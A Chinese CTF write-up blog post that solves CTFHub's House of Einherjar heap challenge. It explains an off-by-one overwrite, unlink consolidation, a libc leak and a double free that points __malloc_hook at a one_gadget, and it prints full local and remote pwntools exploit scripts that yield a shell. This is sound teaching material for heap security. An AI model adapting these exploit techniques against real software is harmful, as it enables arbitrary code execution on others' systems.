House of Einherjar

最新推荐文章于 2024-11-01 16:03:12 发布
最新推荐文章于 2024-11-01 16:03:12 发布
阅读量134 收藏
点赞数
分类专栏: PWN 网络安全 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KaliLinux_V/article/details/128933128
版权
该文章详细介绍了如何利用HouseofEinherjar漏洞进行堆溢出和offbyone漏洞的利用,通过编辑和释放chunk来操纵内存,最终实现doublefree并利用malloc_hook获取shell。过程包括申请和释放特定大小的chunk,修改内存中的指针,以及泄露libc地址来定位关键函数地址。
摘要由CSDN通过智能技术生成

漏洞原因

关于漏洞的一些介绍这里就不过多讲解了,下面引用这位师傅的文章,介绍这个漏洞
House of Einherjar

下面以CTFHub 技能树的House of Einherjar来讲。

先来看题目,其他函数就不讲了,直接看edit函数

漏洞点


这里v2 = size[v1]是在scanf之前,设置的,存在堆溢出,不止一个字节。即可写入的字节为申请的最后一个chunk的大小加1。
read()这里存在,off by one 漏洞。这里主要就讲off by one 来打。

利用方法

三个chunk通过后向unlink实现double free

先把前面的代码写好

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
#io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",37019)
io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))


def add(idx,size):
	ru(b"Your choice: ")
	sl(b"1")
	ru(b"Give me a book ID: ")
	sl(str(idx))
	ru(b"how long: ")
	sl(str(size))

def show(idx):
	ru(b"Your choice: ")
	sl(b"2")
	ru(b"Which book do you want to show?")
	sl(str(idx))

def free(idx):
	ru(b"Your choice: ")
	sl(b"3")
	ru(b"Which one to throw?")
	sl(str(idx))

def edit(idx,data):
	ru(b"Your choice: ")
	sl(b"4")
	ru(b"Which book to write?")
	sl(str(idx))
	ru(b"Content: ")
	s(data)

先申请4个chunk,注意chunk_0和chunk_2必须是0xf0结尾,才能保证创建后为chunk的size是\x00结尾。chunk_3用来做分隔,chunk_1是来写内容的。

add(0,0xf0)
add(1,0x68)
add(2,0xf0)
add(3,0x68)

先,free掉chunk_0,再编辑chunk_1使其覆盖掉chunk_2的prev_size和prev_inuse位。最后再free掉chunk_2触发unlink合并。最后进入unsorted bins的地址是chunk_0的地址,注意这里chunk_1并没有被free,所以再申请回chunk_0,之后main_arena的地址就放在了chunk_1中。

free(0)
edit(1,p64(0)*12+p64(0x170)+p8(0))
free(2)
add(0,0xf0)

之后泄露libc地址和相关函数地址。

show(1)
ru(b"Content: ")
main_arena = uu64(r(6))
libc_base = main_arena-88-0x10-libc.sym['__malloc_hook']
malloc_hook = libc_base+libc.sym['__malloc_hook']
realloc_hook = libc_base+libc.sym["realloc"]
fake_chunk = malloc_hook-0x23
gadget = [0x45206,0x4525a,0xef9f4,0xf0897]
one_gadget = libc_base+gadget[1]
print("libc_base------------->: ",hex(libc_base))
print("fake_chunk------------->: ",hex(fake_chunk))

然后再申请一个和chunk_1一样大小的chunk_4,这时chunk_4也是指向chunk_1,因为之前unsorted bin中的大小为chunk_1+chunk_2,申请chunk_4时unsorted bin做分割吧chunk_1给chunk_4,这时有2个chunk指向同一个chunk。然后利用double free改malloc_hook的地址为one_gadget。拿到shell。

add(4,0x68)
free(4)
edit(1,p64(fake_chunk))
add(4,0x68)
add(3,0xf0)
add(5,0x68)
edit(5,b"a"*3+p64(0)+p64(one_gadget)+p64(realloc_hook+16))

add(6,0x10)

打远程的exp为

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",37019)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))


def add(idx,size):
	ru(b"Your choice: ")
	sl(b"1")
	ru(b"Give me a book ID: ")
	sl(str(idx))
	ru(b"how long: ")
	sl(str(size))

def show(idx):
	ru(b"Your choice: ")
	sl(b"2")
	ru(b"Which book do you want to show?")
	sl(str(idx))

def free(idx):
	ru(b"Your choice: ")
	sl(b"3")
	ru(b"Which one to throw?")
	sl(str(idx))

def edit(idx,data):
	ru(b"Your choice: ")
	sl(b"4")
	ru(b"Which book to write?")
	sl(str(idx))
	ru(b"Content: ")
	s(data)

add(0,0xf0)
add(1,0x68)
add(2,0xf0)
add(3,0x68)

free(0)
edit(1,p64(0)*12+p64(0x170)+p8(0))
free(2)
add(0,0xf0)

show(1)
ru(b"Content: ")
main_arena = uu64(r(6))
libc_base = main_arena-88-0x10-libc.sym['__malloc_hook']
malloc_hook = libc_base+libc.sym['__malloc_hook']
realloc_hook = libc_base+libc.sym["realloc"]
fake_chunk = malloc_hook-0x23
gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget = libc_base+gadget[1]
print("libc_base------------->: ",hex(libc_base))
print("fake_chunk------------->: ",hex(fake_chunk))

add(4,0x68)
free(4)
edit(1,p64(fake_chunk))
add(4,0x68)
add(3,0xf0)
add(5,0x68)
edit(5,b"a"*3+p64(0)+p64(one_gadget)+p64(realloc_hook+16))

add(6,0x10)


itr()
saulgoodman-q
关注
专栏目录
Heap Exploitation(简体中文)1
08-03
- House of Spirit、House of Lore、House of Force、House of Einherjar:是经典的堆利用技术,涉及堆内存的精确控制和操纵,以实现任意代码执行。 0x6 安全编码指南: 这部分内容可能包含如何避免上述漏洞的编码...
heap-exploitation.pdf
02-01
- **House of Einherjar**:一种复杂的利用方法,涉及多个内存块的精细控制。 #### 安全编码指导原则 - **避免使用不安全的函数**:例如使用`strdup`替代`strcpy`等。 - **验证输入数据**:确保所有外部输入都经过...
House Of Einherjar
qq_61670993的博客
11-20 188
house of Einherjar
House of einherjar
tbsqigongzi的博客
07-31 487
释放堆块时,unlink后向合并堆块,强制使得malloc返回一个几乎任意地址的chunk。free函数中的后向合并核心操作如下后向合并时,新的chunk的位置取决于chunk_at_offset(p,-((long)prevsize))
【PWN】House Of Einherjar&House Of Force
u014377094的博客
05-04 396
ctfwiki上house系列第一个与第二个。利用方法也相对简单,内容也较少,决定一块儿复习了。 House Of Einherjar House Of Einherjar个人理解,通过修改victim堆块的pre_size和pre_inuse,free操作会检查前后已经被释放的堆块,并对都释放了的堆块进行合并操作,如果能够有效伪造堆块fake_chunk,可以让victim块和fake_chunk均伪造为释放状态,最后合并成一个特别大的块,再次申请来某片空间的控制权。 由于extend的操作,其不得
《CTF竞赛权威指南》|house of einherjar
qq_50883855的博客
11-22 842
house of einherjar
好好说话之House Of Einherjar
hollk’s blog
06-10 1497
又鸽了好久,抱歉哈~ 总的来说House Of Einherjar这种利用方法还是挺简单的,有点像chunk extend/shrink技术,只不过该技术是后向,并且利用top_chunk合并机制,个人觉得杀伤力比较强大
[house of einherjar] tinypad
huzai9527的博客
05-27 171
[house of einherjar] tinypad 1. Ida 分析 程序直接显示chunk中的内容,相当于show了 delete存在uaf edit函数,tinypad缓冲区读入数据 add函数,只能申请4个chunk,使用read_until读入 read_until存在off by null 2. 思路 条件总结,存在可编辑的数组,存在off by null,chunk中的数据没法轻易的修改(strcpy \x00截断了),可以使用house of ein
【PWN学习之House of 系列】House Of Einherjar
weixin_41748164的博客
01-01 1035
溢出写、off by one、off by null。
House Of Einherjar(2016 Seccon tinypad)
九层台
09-02 1068
栗子https://github.com/tower111/software.git got表不可写:劫持程序执行流的思路1.复写hook函数。2.覆盖返回地址 canary和NX保护。 漏洞和数据结构 if ( v13 > 0 && v13 <= 4 ) { if ( *(_QWORD *)&tinypad[16 *...
Tinypad Seccon CTF 2016(House Of Einherjar)
Bill
04-18 1308
Tinypad Seccon CTF 2016(House Of Einherjar) 序言 随着对how2heap的学习, 难度也是越来越大, 改革进入了深水区. 程序运行 1.菜单 | [A] Add memo | | [D] Delet...
深入理解堆内存与 heap 漏洞利用
5. House of Spirit、House of Lore、House of Force和House of Einherjar:这些都是堆溢出攻击的经典技术,通过不同的手段来操控堆内存,达到代码执行或权限提升的目的。 最后,书中提到了安全编码指南,旨在帮助...
基于 SM3 的密钥派生函数 (KDF):国密合规的安全密钥生成方案
A_Lonely_Smile的博客
10-29 1036
在现代加密技术中,密钥派生函数(Key Derivation Function, KDF)是一个将初始输入(如密码、共享密钥等)转换为安全密钥的过程,用于实现加密、消息认证等密码操作。特别是在符合国密标准的场景中,基于 SM3 的 KDF 已成为一种常用的密钥生成方式。本文将详细讲解 SM3-KDF 的工作原理,逐步介绍其实现过程,并提供 Java 代码示例,帮助您理解如何在项目中应用 SM3-KDF。
冷钱包与热钱包的差异 | 加密货币存储的安全方案
最新发布
tusik68的博客
11-01 1222
想要安全存储加密货币?了解冷钱包和热钱包的核心差异,找到适合的存储方式,确保您的数字资产安全无忧。
【Python爬虫实战】网络爬虫完整指南:HTTP/HTTPS协议与爬虫安全实践
小火龙的博客
10-29 1219
是互联网的核心协议之一,用于在客户端(如浏览器或爬虫)和服务器之间传输数据。HTTP协议定义了请求和响应的格式,帮助不同设备进行信息交换,例如我们在浏览网页时,浏览器就是通过HTTP向服务器请求页面内容,然后显示在用户面前。是HTTP协议的升级版,通过SSL/TLS加密协议增强了数据传输的安全性。HTTPS协议会在数据传输过程中对数据进行加密,防止中途被拦截或篡改,因此在保护用户隐私和敏感信息方面起到了重要作用。
安全警告您正在访问危险网站怎么关闭
gmqqcsdn的博客
10-30 695
当您遇到“安全警告:您正在访问危险网站”的提示时,不要急于关闭或绕过。它通常是设备或浏览器为保护您免受恶意网站攻击而做出的反应。通过理解警告产生的原因、合理关闭提示的方法,并养成良好的上网习惯,可以有效减少这类安全提示带来的困扰。谨记,关闭安全警告并不等于远离风险,遵循安全浏览规范才能真正保护您的网络安全
Linux系统安全配置
qq_24442273的博客
10-28 1028
【代码】Linux系统安全配置。
漫途焊机安全生产监管方案,提升安全生产管理水平!
mantoo2014的博客
11-01 325
随着智能制造时代的到来,企业安全生产管理的重要性日益凸显。因此,利用物联网技术和设备监控技术加强焊机安全生产监管,成为企业提升安全生产管理效率、降低安全事故率的重要手段。漫途焊机安全生产监管方案,凭借其物联网技术和设备监控技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

saulgoodman-q

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值